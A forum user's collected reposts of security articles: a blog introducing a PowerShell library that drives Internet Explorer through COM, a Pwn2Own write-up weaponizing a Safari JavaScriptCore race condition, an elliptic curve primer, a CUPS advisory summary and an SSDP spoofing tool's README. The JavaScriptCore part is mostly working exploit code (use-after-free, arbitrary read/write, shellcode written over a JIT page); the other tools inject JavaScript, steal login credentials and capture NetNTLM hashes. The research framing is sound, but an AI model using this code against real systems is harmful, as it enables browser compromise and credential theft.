-
Posts
18725 -
Joined
-
Last visited
-
Days Won
707
Everything posted by Nytro
-
COM and the PowerThIEf Tuesday 10 July 2018/by Rob Maslen Recently, Component Object Model (COM) has come back in a big way, particularly with regards to it being used for persistence and lateral movement. In this blog we will run through how it can also can be used for limited process migration and JavaScript injection within Internet Explorer. We will then finish with how this was put together in our new PowerShell library Invoke-PowerThIEf and run through some situations it can aid you, the red team, in. Earlier this year I became aware of a technique that involved Junction Folders/CLSID that had been leaked in the Vault 7 dump. It was when I began looking at further applications of these that I also learned about the Component Object Model (COM) ability to interact with and automate Internet Explorer. This, of course, is not a new discovery; a lot of the functionality is well documented on sites like CodeProject. However, it hadn’t been organised into a library that would aid the red team workflow. This formed the basis of my talk “COM and the PowerThIEf” at SteelCon in Sheffield on 7th July 2018. The slides for the talk can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Steelcon-2018-com-powerthief-final.pdf The talk itself is here: Getting up to speed with COM Before we dive into this, if you are not familiar with COM then I would highly recommend the following resources. These are a selection of some of the recent excellent talks & blog posts on the subject that I would recommend if you want to know more. COM in 60 Seconds by James Forshaw – https://vimeo.com/214856542 Windows Archaeology by Casey Smith & Matt Nelson – https://www.youtube.com/watch?v=3gz1QmiMhss Lateral Movement using Excel Application and DCOM by Matt Nelson – https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ Junction Folders I first came across the Junction Folders/CLSID technique mentioned above in one of b33f’s excellent Patreon videos. As I understand it, this was first used as a method for persistence, in that if you name a folder in the format CLSID.{<CLSID>} then when you navigate to that folder, explorer will perform a lookup in the registry upon the CLSID and then run whatever COM Server has been registered. As part of his DefCon 25 WorkShop (which is worth a read, hosted at https://github.com/FuzzySecurity/DefCon25) he released a tool called Hook-InProcServer that enabled you to build the registry structure required to be used for a COM Hijack or for the JunctionFolders/CLSID technique. These were both being used as a Persistence mechanism and I began wondering if this might be possible to use as a means of Process Migration, at least into explorer.exe. Step one was to find if it was possible to programmatically navigate to one of the configured folders and – yes – it turns out that it is. In order to be able to navigate, we first need to gain access to any running instances of explorer. Windows makes this easy via the ShellWindows object: https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx Enumerating the Item property upon this object lists all the current running instances of Explorer and Internet Explorer (I must admit I thought this was curious behaviour). ShellWindows is identified by the CLSID “{9BA05972-F6A8-11CF-A442-00A0C90A8F39}”; the following PowerShell demonstrates activating it. 1 2 3 $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) The objects returned by indexing the .Item collection will be different based upon if it is an explorer and IE instance. An easy check is using the FullName which exists on both and has the name of the application, as shown here. 1 2 3 4 5 6 $fileName = [System.IO.Path]::GetFileNameWithoutExtension($shWin[0].FullName); if ($fileName.ToLower().Equals("iexplore")) { // Do your IE stuff here } This article (https://www.thewindowsclub.com/the-secret-behind-the-windows-7-godmode) from 2010 not only contains the Vault7 technique but also shows that it is possible to navigate to a CLSID using the syntax shell:::{CLSID}. Assuming that we have at least one IE window open, we are able to index the ShellWindows.Item object in order to gain access to that window (e.g. to gain access to the first IE window, use $shWin[0].Item). This will provide us an object that represents that instance of IE and is of a type called IWebBrowser2. Looking further into this type, we find in the documentation that it has a method called Navigate2. (https://msdn.microsoft.com/en-us/library/aa752134(v=vs.85).aspx). The remarks on the MSDN page for this method state that it was added to extend the Navigate method in order to “allow for shell integration”. The following code will activate ShellWindows, assuming the first window is an IE instance (this is a proof of concept) and will then attempt to navigate to the Control Panel via the CLSID for Control Panel (which can be found in the registry). 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{ED7BA470-8E54-465E-825C-99712043E01C}", 2048) /* CLSID must be in the format "shell::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab: https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ */ The following animation shows what happens when this code is run: Control Panel being navigated to via CLSID ID: We can then see via a trace from Process Monitor that IE has looked up the CLSID and then navigated to it, eventually opening it up in explorer, which involved launching the DLL within the InProcServer registry key. If we create our own registry keys we then have a method of asking IE (or Explorer) to load a DLL for us all from the comfort of another process. We don’t always want network connections going out from Word.exe, do we? In the case of IE the DLL must be x64. There are methods of configuring the registry entries to execute script; I suggest that you look at subTee’s or bohop’s excellent work for further information. JavaScript Once a reference is obtained to an Internet Explorer window it is then possible to access the DOM of that instance. As expected, you then have full access to the page and browser. You can view and edit HTML, inject JavaScript, navigate to other tabs and show/hide the window, for example. The following code snippet demonstrates how it is possible to inject and execute JavaScript: 1 2 3 4 5 $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $parentwin = $shWin[0].Document.parentWindow $parentwin.GetType().InvokeMember("eval", [System.Reflection.BindingFlags]::InvokeMethod, $null, $parentwin, @("alert('Self XSS, meh \r\n\r\n from '+ document.location.href)")) The difference this time is that we actually have to locate the eval method on the DOM window before being able to call it. This requires using .NET’s Reflection API to locate and Invoke the method. The following shows what happens this code is run. Where is this all going? Well, despite the programming constructs and some of the techniques being well documented, there didn’t appear to be a library out there which brought it all together in order to help a red team in the following situations: The target is using a password manager, e.g. LastPass where key-logging is ineffective. The user is logged into an application and we want to be able to log them out without having to clear all browser history and cookies. The target application is in a background tab and can‘t wait for user to switch tabs. We need to view or get HTML from that page. We want to view a site from the targets IP address, without the target being aware. This led to me writing the PowerThIEf library which is now hosted at https://github.com/nettitude/Invoke-PowerThIEf. The functionality included in the initial release is as follows: DumpHtml: Retrieves HTML from the DOM, can use some selectors (but not jQuery style – yet). ExecPayload: Uses the migrate technique from earlier to launch a payload DLL in IE. HookLoginForms: Steals credentials by hooking the login form and monitoring for new windows. InvokeJS : Executes JavaScript in the window of your choice. ListUrls: Lists the urls of all currently opened tabs/windows. Navigate: Navigate to another URL. NewBackgroundTab: Creates a new tab in the background. Show/HideWindow: Shows or Hides a browsing window. Examples of usage and functionality include: Extracting HTML from a page: Logging the user out, in order to capture credentials: Using the junction folders to trigger a PoshC2 payload: Capturing credentials in transit entered via LastPass: Usage The latest Invoke-PowerThIEf documentation can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/README.md. Roadmap Further functionality is planned in the future and will include Screenshot: Screenshot all the browser windows. CookieThIEf: Steal cookies (session cookies). Refactor DOM event handling: Developing Complex C# wrapped in Powershell is not ideal. Pure C# Module Support for .Net 2.0-3.5 Download GitHub: https://github.com/nettitude/Invoke-PowerThIEf Sursa: https://labs.nettitude.com/blog/com-and-the-powerthief/
-
Weaponization of a JavaScriptCore Vulnerability Illustrating the Progression of Advanced Exploit Primitives In Practice July 11, 2018 / Nick Burnett, Patrick Biernat, Markus Gaasedelen Software bugs come in many shapes and sizes. Sometimes, these code defects (or ‘asymmetries’) can be used to compromise the runtime integrity of software. This distinction is what helps researchers separate simple reliability issues from security vulnerabilities. At the extreme, certain vulnerabilities can be weaponized by meticulously exacerbating such asymmetries to reach a state of catastrophic software failure: arbitrary code execution. In this post, we shed some light on the process of weaponizing a vulnerability (CVE-2018-4192) in the Safari Web Browser to achieve arbitrary code execution from a single click of an unsuspecting victim. This is the most frequently discussed topic of the exploit development lifecycle, and the fourth post in our Pwn2Own 2018 series. A weaponized version of CVE-2018-4192, executing arbitrary code against JavaScriptCore in early 2018 If you haven’t been following along, you can read about how we discovered this vulnerability, followed by a walkthrough of its root cause analysis. The very first post of this series provides a top level discussion of the full exploit chain. Exploit Primitives While developing exploits against hardened or otherwise complex software, it is often necessary to use one or more vulnerabilities to build what are known as ‘exploit primitives’. In layman’s terms, a primitive refers to an action that an attacker can perform to manipulate or disclose the application runtime (eg, memory) in an unintended way. As the building blocks of an exploit, primitives are used to compromise software integrity or bypass modern security mitigations through advanced (often arbitrary) modifications of runtime memory. It is not uncommon for an exploit to string together multiple primitives towards the ultimate goal of achieving arbitrary code execution. The metamorphosis of software vulnerabilities, by Joe Bialek & Matt Miller (Slides 6-10) In the general case, it is impractical (if not impossible) to defend real world applications against an attacker who can achieve an ‘Arbitrary Read/Write’ primitive. Arbitrary R/W implies an attacker can perform any number of reads or writes to the entire address space of the application’s runtime memory. While extremely powerful, an arbitrary R/W is a luxury and not always feasible (or necessary) for an exploit. But when present, it is widely recognized as the point from which total compromise (arbitrary code execution) is inevitable. Layering Primitives From an educational perspective, the JavaScriptCore exploit that we developed for Pwn2Own 2018 is a great illustration of what layering increasingly powerful primitives looks like in practice. Starting from the discovered vulnerability, we have broken our JSC exploit down into approximately six different phases from which we nurtured each of our exploit primitives from: Forcefully free a JSArray butterfly using our race condition vulnerability (UAF) Employ the freed butterfly to gain a relative Read/Write (R/W) primitive Create generic addrof(...) and fakeobj(...) exploit primitives using the relative R/W Use generic exploit primitives to build an arbitrary R/W primitive from a faked TypedArray Leverage our arbitrary R/W primitive to overwrite a Read/Write/Execute (RWX) JIT Page Execute arbitrary code from said JIT Page Each of these steps required us to study a number of different JavaScriptCore internals, learned through careful review of the WebKit source code, existing literature, and hands-on experimentation. We will cover some of these internals in this post, but mostly in the context of how they were leveraged to build our exploit primitives. UAF Target Selection From the last post, we learned that the discovered race condition could be used to prematurely free any type of JS object by putting it in an array, and calling array.reverse() at a critical moment. This can create a malformed runtime state in which a freed object may continue to be used in what is called ‘Use-After-Free’ (UAF). We can think of this ability to incorrectly free arbitrary JS objects (or their internal allocations) as a class-specific exploit primitive against JSC. The next step would be to identify an interesting object to target (and free). In exploit development, array-like structures that maintain an internal ‘length’ field are attractive to attackers. If a malicious actor can corrupt these dynamic length fields, they are often able to index the array far outside of its usual bounds, creating a more powerful exploit primitive. Corrupting a length field in an array-like structure can allow for Out-of-Bounds array manipulations Within JavaScriptCore, a particularly interesting and accessible construct that matches the pattern depicted above is the backing butterfly of a JSArray object. The butterfly is a structure used by JSC to store JS object properties and data (such as array elements), but it also maintains a length field to bound user access to its storage. As an example, the following gdb dump + diagram shows a JSArray with its backing store (a butterfly) that we have filled with floats (represented by 0x4141414141414141 …). The green fields depict the internally managed size fields of the backing butterfly: Dumping a JSArray, and depicting the relationship with its backing butterfly From the Phrack article Attacking JavaScript Engines (Section 1.2), Saleo describes butterflies in greater detail: “Internally, JSC stores both [JS object] properties and elements in the same memory region and stores a pointer to that region in the object itself. This pointer points to the middle of the region, properties are stored to the left of it (lower addresses) and elements to the right of it. There is also a small header located just before the pointed to address that contains the length of the element vector. This concept is called a “Butterfly” since the values expand to the left and right, similar to the wings of a butterfly.” In the next section, we will attempt to forcefully free a butterfly using our vulnerability. This will leave a dangling butterfly pointer within a live JSArray, prone to malicious re-use (UAF). Forcing a Useful UAF Due to the somewhat chaotic nature of our race-condition, we will want to start our exploit (written in JavaScript) by constructing a top level array that contains a large number of simple ‘float arrays’ to better our chances of freeing at least one of them (eg, ‘winning the race’😞 print("Initializing arrays..."); var someArray1 = Array(1024); for (var i = 0; i < someArray1.length; i++) someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x41414141… ... Note that the use of floats are somewhat common in browser exploits because they are one of the few native 64bit JS types. It allows one to read or write arbitrary 64bit values (contiguously) to the backing array butterfly which will be more relevant later on in this post. With our target arrays allocated as elements of someArray1, we attempt to trigger the race condition through repeated use of array.reverse(), and stimulation of the GC (to help schedule mark-and-sweeps): ... print("Starting race..."); v = [] for (var i = 0; i < 506; i++) { for(var j = 0; j < 0x20; j++) someArray1.reverse() v.push(new String("C").repeat(0x10000)) // stimulate the GC } ... If successful, we expect to have freed one or more of the backing butterflies used by the float arrays stored within someArray1. Visually, our results will look something like this: The race condition will free free some butterflies on the heap, while leaving their JSArray cells intact While driving the race condition, the JSArray v will eventually grow its backing butterfly (through pushes) such that its backing butterfly can get allocated over some of the freed butterfly allocations. The backing butterfly for \'v\' should eventually get re-allocated over some of the freed butterflies To confirm this hypothesis, we can inspect all the lengths of arrays we targeted with our race condition. If successful, we expect to find one or more arrays with an abnormal length. This is an indication that the butterfly has been freed, and it is now a dangling pointer into memory owned by a new object (specifically, v) ... print("Checking for abnormal array lengths..."); for (var i = 0; i < someArray1.length; i++) { if(someArray1[i].length == 128) // ignore arrays of expected length... continue; print('len: 0x' + someArray1[i].length.toString(16)); } The snippets provided in this section make up a new Proof-of-Concept (PoC) called x.js. Running this short script a few times, it can be observed that the vulnerability is pretty reliably reporting multiple JSArrays with abnormal lengths. This is evidence that the backing butterflies for some of our arrays have been freed through the race condition, losing ownership of their underlying data (which now belongs to v). The PoC prints abnormal array lengths found during each run, implying potentially unbounded (malformed) arrays Explicitly, we have used the race condition to force a UAF of one or more (random) JSArray butterflies, and now the dangling butterfly pointers are pointing at unknown data. We have used our race condition to overlay a larger (living) allocation v with one or more freed butterflies. From this point, it is easy to demonstrate full control over the ‘abnormal’ array lengths teased above to achieve what is known as a ‘relative R/W’ exploit primitive. Relative R/W Primitive By filling the larger overlayed butterfly v with arbitrary data (in this case, floats), we are able to inadvertently set the ‘length’ property pointed at by one or more of the freed JSArray butterflies. The code for this is only one additional line inserted into our PoC (v.fill(...)). Putting it all together, this is approximately what we have sketched out so far: print("Initializing arrays..."); var someArray1 = Array(1024); for (var i = 0; i < someArray1.length; i++) someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x41414141... print("Starting race..."); v = [] for (var i = 0; i < 506; i++) { for(var j = 0; j < 0x20; j++) someArray1.reverse() v.push(new String("C").repeat(0x10000)) // stimulate the GC } print("Filling overlapping butterfly with 0x42424242..."); v.fill(156842099844.51764) print("Checking for abnormal array lengths..."); for (var i = 0; i < someArray1.length; i++) { if(someArray1[i].length == 128) // ignore arrays of expected length... continue; print('len: 0x' + someArray1[i].length.toString(16)); } Executing this new PoC a few times, we reliably see multiple arrays claiming to have an array length of 0x42424242. A corrupted or otherwise radically incorrect array length should be alarming to any developer. The PoC reliably printing multiple arrays with an attacker-controlled (unbounded) length These ‘malformed’ (dangling) array butterflies are no longer bounded by a valid length. By pulling one of these malformed JSArray objects out of someArray1 and using them as one normally would, we can now index far past their ‘expected’ length to read or write nearby (relative) heap memory. // pull out one of the arrays with an 'abnormal' length oob_array = someArray1[i]; // write the value 0x41414141 to array index 999999 (Out-of-Bounds Write) oob_array[999999] = 0x41414141; // read memory from index 987654321 of the array (Out-of-Bounds Read) print(oob_array[987654321]); Being able to read or write Out-of-Bounds (OOB) is an extremely powerful exploit primitive. As an attacker, we can now peek and poke at other parts of runtime memory almost as if we were using a debugger. We have effectively broken the fourth wall of the application runtime. Limitations of a Relative R/W Unfortunately, there are several factors inherent to JSArrays that limit the utility of the relative R/W primitive we established in the previous section. Chief among these limitations is that the length attribute of the JSArray is stored and used as a 32-bit signed integer. This is a problem because it means we can only index ‘forwards’ out of bounds, to read or write heap data that is close behind our butterfly. This leaves a significant portion of runtime memory inaccessible to our relative R/W primitive. // relative access limited 0-0x7FFFFFFF forward from malformed array print(oob_array[-1]); // bad index (undefined) print(oob_array[0]); // okay print(oob_array[10000000]); // okay print(oob_array[0x7FFFFFFF]); // okay print(oob_array[0xFFFFFFFF]); // bad index (undefined) print(oob_array[0xFFFFFFFFFFF]); // bad index (undefined) Our next goal is to build up to an arbitrary R/W primitive such that we can touch memory anywhere in the 64bit address space of the application runtime. With JavaScriptCore, there are a few different documented techniques to achieve this level of ubiquity which we will discuss in the next section. Utility of TypedArrays In the JavaScript language specification, there is a family of objects called TypedArrays. These are array-like objects that allow JS developers to exercise more precise & efficient control over memory through lower level data types. TypedArrays were added to JavaScript to facilitate scripts which perform audio, video, and image manipulation from within the browser. It is both more natural and performant to implement these types of computations with direct memory manipulation or storage. For these same reasons, TypedArrays are often an interesting tool for exploit writers. The structure of a TypedArray (in the context of JavaScriptCore) is comprised of the following components: A JSCell, similar to all other JSObjects A unused Butterfly pointer field A pointer to the underlying ‘backing store’ for TypedArray data Backing store length Mode flags Critically, the backing store is where the user data stored into a TypedArray object is actually located in memory. If we can overwrite a TypedArray’s backing store pointer, it can be pointed at any address in memory. A diagram of the TypedArray JSObject in memory, with its underlying backing store The simplest way to achieve arbitrary R/W would be to allocate a TypedArray object somewhere after our malformed JSArray, and then use our relative R/W to modify the backing store pointer to an address of our choosing. By reading or writing to index 0 of the TypedArray, we will interface with the memory at the specified address directly. Arbitrary R/W can be achieved by overwriting the backing store pointer within a TypedArray With little time to study the JSC heap & garbage collector algorithms, it proved difficult for us to place a TypedArray near our relative R/W through pure heap feng-shui. Instead, we employed documented exploitation techniques to create a ‘fake’ TypedArray and achieve the same result. Generic Exploit Primitives Faking our own TypedArray requires more work than a lucky heap allocation, but it should be significantly more reliable (and deterministic) in practice. The ability to craft fake JS objects is dependent on two higher level ‘generic’ exploit primitives that we must build using our relative R/W: addrof(...) to provide us the memory address of any javascript object we give it fakeobj(...) to take a memory address, and return a javascript object at that location. To create our addrof(...) primitive, we first create a normal JSArray (oob_target) whose butterfly is located after our corrupted JSArray butterfly (the relative R/W). From JavaScript, we can then place any object into the first index of the array [A] and then use our relative R/W primitive oob_array to read the address of the stored object pointer (as a float) out of the nearby array (oob_target). Decoding the float in IEEE 754 form gives us the JSObject’s address in memory : // Get the address of a given JSObject prims.addrof = function(x) { oob_target[0] = x; // [A] return Int64.fromDouble(oob_array[oob_target_index]); // [B] } By doing the reverse, we can establish our fakeobj(...) primitive. This was achieved by using our relative R/W (oob_array) to write a given address into the oob_target array butterfly (as a float) [C]. Reading that array index from JavaScript will return a JSObject for the pointer we stored [D]: // Return a JSObject at a given address prims.fakeobj = function(addr) { oob_array[oob_target_index] = addr.asDouble(); // [C] return oob_target[0]; // [D] } Using our relative R/W primitive, we have created some higher level generic exploit primitives that will help us in creating fake JavaScript objects. It is almost as if we have extended the JavaScript engine with new features! Next, we will demonstrate how these two new primitives can be used to help build a fake TypedArray object. This is what will lead us to achieve a true arbitrary R/W primitive. Arbitrary R/W Primitive Our process of creating a fake TypedArray is taken directly from the techniques shared in the phrack article previously referenced in this post. To be comprehensive, we discuss our use of these methods. To simplify the process of creating a fake TypedArray, we constructed it ‘inside’ a standard JSObject. The ‘container’ object we created was of the form: let utarget = new Uint8Array(0x10000); utarget[0] = 0x41; // Our fake array // Structure id guess is 0x200 // [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)] let jscell = new Int64('0x0118270000000200'); // Construct the object // Each attribute will set 8 bytes of the fake object inline obj = { // JSCell 'a': jscell.asDouble(), // Butterfly can be anything (unused) 'b': false, // Target we want to write to (the 'backing store' field) 'c': utarget, // Length and flags 'd': new Int64('0x0001000000000010').asDouble() }; Using a JSObject in this way makes it easy for us to set or modify any of the objects contents at will. For example, we can easily point the ‘backing store’ (our arbitrary R/W) at any JS object by placing it in the ‘BackingStore’ mock field. Of these items, the JSCell is the most complex to fake. Specifically, the structureID field of JSCells is problematic. At runtime, JSC generates a unique structureID for each class of JavaScript objects. This ID is used by the engine to determine the object type, how it should be handled, and all of its attributes. At runtime, we don’t know what the structureID is for a TypedArray. To get around this issue, we need some way to help ensure that we can “guess” a valid structureID for the type of object we want. Due to some low-level concepts inherent to JavaScriptCore, if we create a TypedArray object, then add at least one custom attribute to it, JavaScriptCore will assign it a unique structureID. We abused this fact to ‘spray’ these ids, making it fairly likely that we could reliably guess an id (say, 0x200) that corresponded to a TypedArray. // Here we will spray structure IDs for Float64Arrays // See http://www.phrack.org/papers/attacking_javascript_engines.html function sprayStructures() { function randomString() { return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5); } // Spray arrays for structure id for (let i = 0; i < 0x1000; i++) { let a = new Float64Array(1); // Add a new property to create a new Structure instance. a[randomString()] = 1337; structs.push(a); } } After spraying a large number of TypedArray IDs, we created a fake TypedArray and guessed a reasonable value for its structureID. We can safely ‘check’ if we guessed correctly by calling instanceOf on the fake TypedArray object. If instanceof returned Float64Array, we knew we had created a ‘valid-enough’ TypedArray object! At this point, we have access to a fake TypedArray from JavaScript, while simultaneously having control over its backing store pointer through utarget. Manipulating the backing store pointer of this TypedArray grants us full read-write access to the entire address space of the process. // Set data at a given address prims.set = function(addr, arr) { fakearray[2] = addr.asDouble(); utarget.set(arr); } // Read 8 bytes as an Int64 at a given address prims.read64 = function(addr) { fakearray[2] = addr.asDouble(); let bytes = Array(8); for (let i=0; i<8; i++) { bytes[i] = utarget[i]; } return new Int64(bytes); } // Write an Int64 as 8 bytes at a given address prims.write64 = function(addr, value) { fakearray[2] = addr.asDouble(); utarget.set(value.bytes); } With our arbitrary R/W capability in hand, we can work towards our final goal: arbitrary code execution. Arbitrary Code Execution On MacOS, Safari/JavaScriptCore still uses Read/Write/Execute (RWX) JIT pages. To achieve code execution, we can simply locate one of these RWX JIT pages and overwrite it with our own shellcode. The first step is to find a pointer to one of these JIT pages. To do this, we created a JavaScript function object and used it a few times. This ensures the function object would have its logic compiled down to machine code, and assigned a region in the RWX JIT pages: // Build an arbitrary JIT function // This was basically just random junk to make the JIT function larger let jit = function(x) { var j = []; j[0] = 0x6323634; return x*5 + x - x*x /0x2342513426 +(x-x+0x85720642*(x+3-x / x+0x41424344)/0x41424344)+j[0]; }; // Make sure the JIT function has been compiled jit(); jit(); jit(); ... We then used our arbitrary R/W primitive and addrof(...) to inspect the function object jit. Traditionally, the object’s RWX JIT page pointer can be found somewhere within the function object. In early January, a ‘pointer poisoning’ patch was introduced into JavaScriptCore to mitigate the Spectre CPU side-channel issues. This was not designed to hide pointers from an attacker with arbitrary R/W, but we are now required to dig a bit deeper through the object for an un-poisoned JIT pointer. // Traverse the JSFunction object to retrieve a non-poisoned pointer log("Finding jitpage"); let jitaddr = prims.read64( prims.read64( prims.read64( prims.read64( prims.addrof(jit).add(3*8) ).add(3*8) ).add(3*8) ).add(5*8) ); log("Jit page addr = "+jitaddr); ... Now that we have a pointer to a RWX JIT page, we can simply plug it into the backing store field of our fake TypedArray and write to it (arbitrary write). The final caveat we have to be mindful of is the size of our shellcode payload. If we copy too much code, we may inadvertently ‘smash’ through other JIT’d functions with our arbitrary write, introducing undesirable instability. shellcode = [0xcc, 0xcc, 0xcc, 0xcc] // Overwrite the JIT code with our INT3s log("Writing shellcode over jit page"); prims.set(jitaddr.add(32), shellcode); ... To gain code execution, we simply call the corresponding function object from JavaScript. // Call the JIT function to execute our shellcode log("Calling jit function"); jit(); Running the full exploit against JSC release, we can see that our Trace / Breakpoint (cc shellcode) is being executed. This implies we have achieved arbitrary code execution. The final exploit demonstrating arbitrary code execution against a release build of JavaScriptCore on Ubuntu 16.04 Having completed the exploit, with a little more work an attacker could embed this JavaScript in any website to pop vulnerable versions of Safari. Given more research & development time, this vulnerability could probably be exploited with a >99% success rate. The last step involves wrapping this JavaScript based exploit in HTML, and tuning timing and figures slightly such that it works more reliably when targeting Apple Safari running on real Mac hardware. A victim could experience complete compromise of their browser by simply clicking the wrong link, or navigating to a malicious website. Conclusion With little prior knowledge of JavaScriptCore, this vulnerability took approximately 100 man-hours to study, weaponize, and stabilize from discovery. In our testing leading up to Pwn2Own 2018, we measured the success rate of our Safari exploit at approximately 95% across 1000+ runs on a 13 inch, i5, 2017 MacBook Pro that we bought for testing. At Pwn2Own 2018, the JSC exploit landed successfully against a 13 inch, i7, 2017 MacBook Pro on three of four attempts, with the race condition failing entirely on the second attempt (possibly exacerbated by the i7). The next step in the zero-day chain is escaping the Safari sandbox to compromise the entire machine. In the next post, we will discuss our process of evaluating the sandbox to identify a vulnerability that led to a root level privilege escalation against the system. Sursa: https://blog.ret2.io/2018/07/11/pwn2own-2018-jsc-exploit/
-
- 1
-
-
Introducing Elliptic Curves Posted on February 8, 2014 by j2kun With all the recent revelations of government spying and backdoors into cryptographic standards, I am starting to disagree with the argument that you should never roll your own cryptography. Of course there are massive pitfalls and very few people actually need home-brewed cryptography, but history has made it clear that blindly accepting the word of the experts is not an acceptable course of action. What we really need is more understanding of cryptography, and implementing the algorithms yourself is the best way to do that. [1] For example, the crypto community is quickly moving away from the RSA standard (which we covered in this blog post). Why? It turns out that people are getting just good enough at factoring integers that secure key sizes are getting too big to be efficient. Many experts have been calling for the security industry to switch to Elliptic Curve Cryptography (ECC), because, as we’ll see, the problem appears to be more complex and hence achieves higher security with smaller keys. Considering the known backdoors placed by the NSA into certain ECC standards, elliptic curve cryptography is a hot contemporary issue. If nothing else, understanding elliptic curves allows one to understand the existing backdoor. I’ve seen some elliptic curve primers floating around with all the recent talk of cryptography, but very few of them seem to give an adequate technical description [2], and legible implementations designed to explain ECC algorithms aren’t easy to find (I haven’t found any). So in this series of posts we’re going to get knee deep in a mess of elliptic curves and write a full implementation. If you want motivation for elliptic curves, or if you want to understand how to implement your own ECC, or you want to understand the nuts and bolts of an existing implementation, or you want to know some of the major open problems in the theory of elliptic curves, this series is for you. The series will have the following parts: Elliptic curves as elementary equations The algebraic structure of elliptic curves Points on elliptic curves as Python objects Elliptic curves over finite fields Finite fields primer (just mathematics) Programming with finite fields Back to elliptic curves Diffie-Hellman key exchange Shamir-Massey-Omura encryption and Digital Signatures Along the way we’ll survey a host of mathematical topics as needed, including group theory, projective geometry, and the theory of cryptographic security. We won’t assume any familiarity with these topics ahead of time, but we do intend to develop some maturity through the post without giving full courses on the side-topics. When appropriate, we’ll refer to the relevant parts of the many primers this blog offers. A list of the posts in the series (as they are published) can be found on the Main Content page. And as usual all programs produced in the making of this series will be available on this blog’s Github page. For anyone looking for deeper mathematical information about elliptic curves (more than just cryptography), you should check out the standard book, The Arithmetic of Elliptic Curves. [1] Okay, what people usually mean is that you shouldn’t use your own cryptography for things that actually matter, but I think a lot of the warnings are interpreted or extended to, “Don’t bother implementing cryptographic algorithms, just understand them at a fuzzy high level.” I imagine this results in fewer resources for people looking to learn cryptography and the mathematics behind it, and at least it prohibits them from appreciating how much really goes into an industry-strength solution. And this mindset is what made the NSA backdoor so easy: the devil was in the details. ↑ [2] From my heavily biased standpoint as a mathematician. ↑ Sursa: https://jeremykun.com/2014/02/08/introducing-elliptic-curves/
-
CUPS Local Privilege Escalation and Sandbox Escapes Wednesday, July 11, 2018 at 7:25PM Gotham Digital Science has discovered multiple vulnerabilities in Apple’s CUPS print system affecting macOS 10.13.4 and earlier and multiple Linux distributions. All information in this post has been shared with Apple and other affected vendors prior to publication as part of the coordinated disclosure process. All code is excerpted from Apple’s open source CUPS repository located at https://github.com/apple/cups The vulnerabilities allow for local privilege escalation to root (CVE-2018-4180), multiple sandbox escapes (CVE-2018-4182 and CVE-2018-4183), and unsandboxed root-level local file reads (CVE-2018-4181). A related AppArmor-specific sandbox escape (CVE-2018-6553) was also discovered affecting Linux distributions such as Debian and Ubuntu. When chained together, these vulnerabilities allow an unprivileged local attacker to escalate to unsandboxed root privileges on affected systems. Affected Linux systems include those that allow non-root users to modify cupsd.conf such as Debian and Ubuntu. Redhat and related distributions are generally not vulnerable by default. Consult distribution-specific documentation and security advisories for more information. The vulnerabilities were patched in macOS 10.13.5, and patches are currently available for Debian and Ubuntu systems. GDS would like to thank Apple, Debian, and Canonical for working to patch the vulnerabilities, and CERT for assisting in vendor coordination. Sursa: https://blog.gdssecurity.com/labs/2018/7/11/cups-local-privilege-escalation-and-sandbox-escapes.html
-
Overview This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network. Users who are tempted to open the device are shown a configurable webpage. By default, this page will load a hidden image over SMB, allowing you to capture or relay the NetNTLM challenge/response. This works against Windows 10 systems (even if they have disabled NETBIOS and LLMNR) and requires no existing credentials to execute. As a bonus, this tool can also detect and exploit potential zero-day vulnerabilities in the XML parsing engines of applications using SSDP/UPNP. To try this, use the 'xxe-smb' template. If a vulnerable device is found, it will alert you in the UI and then mount your SMB share with NO USER INTERACTION required via an XML External Entity (XXE) attack. If you get lucky and find one of those, you can probably snag yourself a nice snazzy CVE (please reference evilSSDP in the disclosure if you do). Demo Video Usage A typical run looks like this: essdp.py eth0 You need to provide the network interface at a minimum. The interface is used for both the UDP SSDP interaction as well as hosting a web server for the XML files and phishing page. The port is used only for the web server and defaults to 8888. The tool will automatically inject an IMG tag into the phishing page using the IP of the interface you provide. To work with hashes, you'll need to launch an SMB server at that interface (like Impacket). This address can be customized with the -s option. You do NOT need to edit the variables in the template files - the tool will do this automatically. You can choose between the included templates in the "templates" folder or build your own simply by duplicating an existing folder and editing the files inside. This allows you to customize the device name, the phishing contents page, or even build a totally new type of UPNP device that I haven't created yet. usage: essdp.py [-h] [-p PORT] [-t TEMPLATE] interface positional arguments: interface Network interface to listen on. optional arguments: -h, --help show this help message and exit -p PORT, --port PORT Port for HTTP server. Defaults to 8888. -t TEMPLATE, --template TEMPLATE Name of a folder in the templates directory. Defaults to "password-vault". This will determine xml and phishing pages used. -s SMB, --smb SMB IP address of your SMB server. Defalts to the primary address of the "interface" provided. Templates The following templates come with the tool. If you have good design skills, please contribute one of your own! bitcoin: Will show up in Windows Explorer as "Bitcoin Wallet". Phishing page is just a random set of Bitcoin private/public/address info. There are no actual funds in these accounts. password-vault: Will show up in Windows Explorer as "IT Password Vault". Phishing page contains a short list of fake passwords / ssh keys / etc. xxe-smb: Will not likely show up in Windows Explorer. Used for finding zero day vulnerabilities in XML parsers. 